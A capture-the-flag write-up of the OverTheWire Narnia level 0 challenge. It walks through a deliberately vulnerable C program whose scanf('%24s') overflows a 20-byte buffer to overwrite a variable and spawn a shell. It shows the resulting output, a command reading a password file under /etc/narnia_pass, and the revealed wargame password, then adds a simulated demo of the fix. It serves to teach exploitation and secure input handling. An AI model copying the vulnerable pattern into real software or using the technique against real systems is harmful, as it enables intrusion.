Learning Pwn using Over The Wire Narnia
Narnia is a wargame for learning basic exploitation.
Each stage contains a vulnerability that is meant to be easy to exploit.
Bugs are easy to find and an exploitation plan is easy to make, because the C source code of each level is available on the Narnia server.
Level0
First I connected to the Narnia server using SSH.
Then I entered narnia0's password.
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance:
It seems to be a problem about overwriting the variable val. I then checked the C source code.
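#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* added: declares setreuid() and geteuid() */

int main(){
    long val=0x41414141;
    char buf[20];

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    /* vulnerable: accepts up to 24 characters for a 20-byte buffer */
    scanf("%24s",&buf);

    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);

    if(val==0xdeadbeef){
        /* val was overwritten with the expected value: spawn a shell */
        setreuid(geteuid(),geteuid());
        system("/bin/sh");
    }
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }

    return 0;
}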
The initial value of val is 0x41414141.
If I can set val to 0xdeadbeef, I can get a shell.
The variable buf can be used for this because it has a buffer-overflow vulnerability: it holds 20 bytes, but scanf("%24s") accepts up to 24 characters.
Writing 24 bytes to buf on the stack therefore overwrites the value of val.
To write the binary value 0xdeadbeef, I used Python.
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: aaaaaaaaaaaaaaaaaaaaᆳ�
val: 0xdeadbeef
I could successfully set val to 0xdeadbeef, but the shell terminated immediately.
I tried it again with the cat command so that the shell would not terminate.
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ�
val: 0xdeadbeef
cat /etc/narnia_pass/narnia1
efeidiedae
I could get narnia1's password from /etc/narnia_pass/narnia1.
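The Level0 overflow and its fix, as an added example that is not part of the original write-up or the Narnia source. A 32-byte array stands in for the stack frame (bytes 0..19 for buf, bytes 20..23 for val, an assumed layout that matches the result above, little-endian as on x86), the input is constructed, and the original "%24s" width is compared with "%19s", which leaves room for the terminating NUL in a 20-byte buffer.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 20 /* char buf[20] in the level's source */

/* Constructed input: 20 filler bytes, then 0xdeadbeef in little-endian order. */
static const char SAMPLE_INPUT[] = "AAAAAAAAAA" "AAAAAAAAAA" "\xef\xbe\xad\xde";

/* Read 4 bytes as a little-endian 32-bit value, independent of the host. */
static uint32_t get_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/*
 * Simulated frame (assumed layout): bytes 0..19 stand in for buf and
 * bytes 20..23 for val. The array is 32 bytes long, so the over-long
 * write stays inside it and the demo has no undefined behaviour.
 * Returns the value of val after the read.
 */
static uint32_t val_after_read(const char *input, int hardened)
{
    unsigned char frame[32] = {0};
    int n;

    memset(frame + BUF_SIZE, 0x41, 4); /* val = 0x41414141 */
    if (hardened)
        n = sscanf(input, "%19s", (char *)frame); /* BUF_SIZE - 1, room for NUL */
    else
        n = sscanf(input, "%24s", (char *)frame); /* width used by the level */
    if (n != 1)
        return 0; /* nothing was read */
    return get_le32(frame + BUF_SIZE);
}

int main(void)
{
    printf("%%24s: val = 0x%08x\n", (unsigned)val_after_read(SAMPLE_INPUT, 0));
    printf("%%19s: val = 0x%08x\n", (unsigned)val_after_read(SAMPLE_INPUT, 1));
    return 0;
}
```

With the width limited to sizeof(buf) - 1, the same input is truncated at 19 characters and val keeps its initial value.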